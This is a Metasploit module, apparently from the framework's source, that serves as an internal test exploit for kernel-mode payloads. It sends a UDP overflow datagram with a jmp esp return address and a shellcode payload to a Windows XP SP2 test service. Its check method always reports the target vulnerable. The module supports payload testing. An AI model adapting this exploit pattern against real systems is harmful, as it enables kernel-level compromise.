##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

#
# This is a test exploit for testing kernel-mode payloads.
#
class MetasploitModule < Msf::Exploit::Remote
  # Manual rank together with autofilter => false (below) keeps this test
  # harness out of any automated module selection.
  Rank = ManualRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::KernelMode

  # Registers module metadata: the payload constraints (1000 bytes of space,
  # no nops, two stack-adjusting prepends) and a single Windows XP SP2 target
  # whose return address is annotated as a jmp esp.
  #
  # @param info [Hash] metadata merged via update_info
  def initialize(info = {})
    payload_opts = {
      'Space'          => 1000,
      'MaxNops'        => 0,
      'Prepend'        => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
      'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF"  # add esp, -500
    }

    xp_sp2 = [
      'Windows XP SP2',
      {
        'Ret'      => 0x80502d7f, # jmp esp
        'Platform' => 'win',
        'Payload'  => {
          'ExtendedOptions' => {
            'Stager'   => 'sud_syscall_hook',
            'Recovery' => 'spin'
          }
        }
      }
    ]

    super(update_info(info,
      'Name'          => 'Internal Kernel-mode Test Exploit',
      'Description'   => 'This module tests the exploitation of a kernel-mode test service.',
      'Author'        => 'skape',
      'License'       => MSF_LICENSE,
      'Arch'          => 'x86',
      'Payload'       => payload_opts,
      'Targets'       => [xp_sp2],
      'DefaultTarget' => 0))
  end

  # Never auto-select this module; it exists for payload testing only.
  #
  # @return [Boolean] always false
  def autofilter
    false
  end

  # No probe is performed: the module unconditionally reports the target as
  # vulnerable, so a `check` result from this module carries no evidence.
  #
  # @return [Msf::Exploit::CheckCode] always Vulnerable
  def check
    Exploit::CheckCode::Vulnerable
  end

  # Sends a single UDP datagram consisting of alphanumeric filler, a fixed
  # four-byte marker, the target return address (32-bit little-endian) and
  # the encoded payload, then waits two seconds before closing the socket.
  #
  # @return [void]
  def exploit
    connect_udp

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Random filler is drawn in the same order the fields are laid out.
    lead_filler = rand_text_alphanumeric(260)
    mid_filler  = rand_text_alphanumeric(28)
    ret_addr    = [target.ret].pack('V') # 32-bit little-endian
    tail_filler = rand_text_alphanumeric(8)

    # NOTE(review): "\xbe\x7f\x00\x00" is presumably a field the test service
    # expects ahead of the overwrite — confirm against the service's request
    # format.
    datagram = lead_filler + "\xbe\x7f\x00\x00" + mid_filler + ret_addr + tail_filler + payload.encoded

    udp_sock.put(datagram)

    # Timed wait with no IO sets: Kernel#select here is a plain two-second
    # pause before the socket is torn down.
    select(nil, nil, nil, 2)

    disconnect_udp
  end

end
